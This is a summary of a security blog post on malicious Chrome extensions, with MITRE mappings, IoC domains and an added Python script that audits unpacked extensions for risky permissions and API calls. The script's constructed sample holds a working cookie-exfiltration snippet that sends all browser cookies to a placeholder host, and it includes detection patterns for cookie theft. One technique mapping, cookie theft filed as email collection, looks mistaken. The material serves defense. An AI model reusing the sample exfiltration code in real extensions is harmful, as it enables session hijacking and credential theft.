The Growing Risk of Malicious Browser Extensions


Malicious browser extensions distributed through trusted stores are increasingly used to hijack user sessions, redirect traffic, and manipulate social media metrics, posing significant security risks. A notable example is a malicious Chrome extension sold for $100,000 that bundles capabilities such as credential theft and cryptocurrency draining.

Key Points

  • Extensions such as Shell Shockers io call chrome.windows.create to open deceptive popup windows that redirect users to tech support scams.
  • The Wikipedia engelsiz giris extension routes traffic through a vulnerable proxy to bypass censorship, but in doing so exposes users to security risks.
  • Some extensions manipulate social media engagement by auto-scrolling and clicking “like” buttons to skew analytics and damage platform authenticity.
  • Operation Phantom Enigma infected over 700 users in Latin America, targeting banking customers and using extensions to bypass two-factor authentication.
  • A malicious Chrome extension sold on the dark web for $100,000 includes features like cookie exfiltration, crypto theft, hidden remote access, and botnet control.
  • Extensions operate with high privileges enabling data exfiltration, keylogging, screen capture, network interception, and persistent backdoors.
  • Users are advised to audit extension permissions, verify developers, and remove unused extensions to mitigate risks.

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – Used in extensions to execute injected JavaScript for crypto draining and interaction automation (“API-based crypto drainer via JavaScript injections”).
  • [T1176] Browser Extensions – Exploited by malicious extensions for session hijacking, redirects, and data exfiltration (“extensions infected 722 users across Latin America… bypassing two-factor authentication”).
  • [T1071] Application Layer Protocol – Used for network interception and redirecting user traffic through proxies and malicious domains (“redirect Wikipedia traffic through a proxy domain”).
  • [T1114] Email Collection – Covers the theft of authentication tokens and cookies used for credential theft (“exfiltrates browser cookies in JSON format every 15 minutes”).
  • [T1119] Automated Collection – Extensions manipulated social media metrics by automatically scrolling and clicking “like” buttons (“artificially inflating likes and views”).
  • [T1219] Remote Access Tools – Hidden Virtual Network Computing (hVNC) functionality in malicious extensions for covert external control (“hidden virtual network computing functionality for covert remote interaction”).
  • [T1565] Data Manipulation – Manipulating user engagement metrics to skew analytics and harm business trust (“some extensions manipulated user engagement metrics on platforms like Facebook”).

Indicators of Compromise

  • [Domain] Malicious redirect domain – funformathgame[.]com used by Shell Shockers io for tech support scams.
  • [Extension Name] Malicious browser extensions – Shell Shockers io, Wikipedia engelsiz giris.
  • [Author] Malicious extension authors – mre1903A (Shell Shockers io), Mehmet Tamac (Wikipedia engelsiz giris), rivemks (seller of a malicious Chrome extension).
  • [Malicious Domain] Proxy domain with vulnerabilities – tr[.]0wikipedia[.]org used by Wikipedia engelsiz giris extension.
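The Key Points advise auditing extension permissions, and the IoC list gives two domains to look for. The following script is an added example, not code from the Socket post or from any extension it names: it statically audits an unpacked Chrome extension by scoring risky manifest permissions and wildcard host access, flagging extension API calls associated with the behaviours described above (cookie reads, chrome.windows.create popups, periodic alarms, outbound sends), matching the post's two IoC domains in bundled scripts, and correlating cookie permission plus cookie read plus outbound send into a single cookie-exfiltration pattern. The permission weights, score thresholds, the sample manifest and scripts, and the placeholder domain c2.example.invalid are all my own assumptions.

```python
"""Static risk audit of an unpacked Chrome extension.

Added example for this summary; it is not code from the Socket post or from
any extension it names. Assumptions: the extension is unpacked on disk as
manifest.json plus .js files, the permission weights and score thresholds
are my own, and the IoC domains are the two listed in the post.
"""
import json
import re
from pathlib import Path

# Permissions that hand an extension the capabilities described in the post
# (cookie/session theft, traffic redirection, page manipulation).
# Weights are an assumption, not a vendor scale.
RISKY_PERMISSIONS = {
    "cookies": 3, "webRequest": 3, "webRequestBlocking": 3, "proxy": 3,
    "debugger": 3, "nativeMessaging": 3, "declarativeNetRequest": 2,
    "scripting": 2, "tabs": 1, "history": 1, "management": 1,
}

# Extension API calls worth flagging in bundled scripts. chrome.windows.create
# is the call the post attributes to the Shell Shockers io popup redirects.
API_PATTERNS = {
    "cookie_read": r"chrome\.cookies\.getAll",
    "popup_window": r"chrome\.windows\.create",
    "tab_redirect": r"chrome\.tabs\.update",
    "periodic_alarm": r"chrome\.alarms\.create",
    "network_send": r"\bfetch\(|XMLHttpRequest|navigator\.sendBeacon",
}

# IoC domains from the post, kept defanged here and refanged at match time.
IOC_DOMAINS_DEFANGED = ["funformathgame[.]com", "tr[.]0wikipedia[.]org"]


def refang(domain: str) -> str:
    return domain.replace("[.]", ".")


def audit_manifest(manifest: dict) -> list[str]:
    """Flag risky permissions and wildcard host access in manifest.json."""
    findings = []
    declared = manifest.get("permissions", []) + manifest.get("optional_permissions", [])
    for perm in declared:
        if perm in RISKY_PERMISSIONS:
            findings.append(f"permission:{perm}")
    # MV2 puts host patterns in "permissions"; MV3 uses "host_permissions".
    hosts = manifest.get("host_permissions", []) + [
        p for p in declared if "://" in p or p == "<all_urls>"
    ]
    for host in hosts:
        if host == "<all_urls>" or re.match(r"^(\*|https?)://\*/", host):
            findings.append(f"broad_host:{host}")
    return findings


def audit_script(name: str, source: str) -> list[str]:
    """Flag notable API calls and IoC domain references in one script."""
    findings = []
    for label, pattern in API_PATTERNS.items():
        if re.search(pattern, source):
            findings.append(f"api:{label}:{name}")
    for domain in IOC_DOMAINS_DEFANGED:
        if refang(domain) in source:
            findings.append(f"ioc:{domain}:{name}")
    return findings


def audit_extension(manifest: dict, sources: dict[str, str]) -> dict:
    """Combine manifest and script findings into a score and verdict."""
    findings = audit_manifest(manifest)
    for name, source in sources.items():
        findings.extend(audit_script(name, source))
    kinds = {":".join(f.split(":")[:2]) for f in findings}
    # Correlation rule: cookie permission + cookie read + outbound send is the
    # shape of the periodic cookie exfiltration the post describes.
    if {"permission:cookies", "api:cookie_read", "api:network_send"} <= kinds:
        findings.append("pattern:cookie_exfiltration")
    score = sum(RISKY_PERMISSIONS[f.split(":")[1]] for f in findings if f.startswith("permission:"))
    score += 2 * sum(f.startswith("broad_host:") for f in findings)
    score += sum(f.startswith("api:") for f in findings)
    score += 5 * sum(f.startswith("ioc:") for f in findings)
    score += 3 * sum(f.startswith("pattern:") for f in findings)
    verdict = "high" if score >= 8 else "medium" if score >= 4 else "low"
    return {"score": score, "verdict": verdict, "findings": findings}


def audit_unpacked(ext_dir: Path) -> dict:
    """Audit an unpacked extension directory (manifest.json + *.js)."""
    manifest = json.loads((ext_dir / "manifest.json").read_text(encoding="utf-8"))
    sources = {
        str(p.relative_to(ext_dir)): p.read_text(encoding="utf-8", errors="replace")
        for p in ext_dir.rglob("*.js")
    }
    return audit_extension(manifest, sources)


# Constructed sample mirroring the behaviours the post attributes to
# malicious extensions; it is not code from any real extension.
SAMPLE_MANIFEST = {
    "manifest_version": 3,
    "name": "constructed-sample",
    "permissions": ["cookies", "tabs", "alarms", "storage"],
    "host_permissions": ["<all_urls>"],
    "background": {"service_worker": "bg.js"},
}
SAMPLE_SOURCES = {
    "bg.js": (
        'chrome.alarms.create("sync", { periodInMinutes: 15 });\n'
        "chrome.alarms.onAlarm.addListener(async () => {\n"
        "  const c = await chrome.cookies.getAll({});\n"
        '  fetch("https://c2.example.invalid/", { method: "POST", body: JSON.stringify(c) });\n'
        "});\n"
        'chrome.windows.create({ url: "https://funformathgame.com/alert", type: "popup" });\n'
    ),
    "content.js": "document.title = 'benign';\n",
}

if __name__ == "__main__":
    print(json.dumps(audit_extension(SAMPLE_MANIFEST, SAMPLE_SOURCES), indent=2))
```

Run it against a real unpacked extension with `audit_unpacked(Path("/path/to/unpacked-extension"))`. The score is a triage aid, not a verdict on its own: a legitimate password manager also needs `cookies` and broad host access, so findings should be read against what the extension claims to do, which is the point of the post's advice to verify developers before trusting permissions.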
Read more: https://socket.dev/blog/the-growing-risk-of-malicious-browser-extensions